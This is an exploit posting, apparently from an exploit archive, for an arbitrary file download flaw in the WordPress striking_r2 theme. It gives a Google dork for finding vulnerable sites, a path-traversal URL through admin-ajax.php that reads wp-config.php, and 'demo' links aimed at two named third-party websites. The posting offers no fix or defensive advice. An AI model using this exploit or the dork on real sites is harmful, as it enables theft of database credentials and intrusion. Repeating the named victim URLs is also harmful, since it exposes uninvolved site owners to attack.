facebook facebook twitter rss

WordPress striking_r2 theme Arbitrary File Download Vulnerability

Author: KkK1337 , Published: 15-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# Title : WordPress striking_r2 theme Arbitrary File Download Vulnerability

# Author : KkK1337

# Risk : Low

# Class: Remote

# Google Dork: inurl:/wp-content/themes/striking_r2

# Date: 10/09/2014

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You can download any file from your target.

Exploit:
http://www.[target].com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Demo:

1. Download wp-config.php file from site:

http://www.kitcuisinemoleculaire.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://www.argeacupuntura.es/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Like us on Facebook :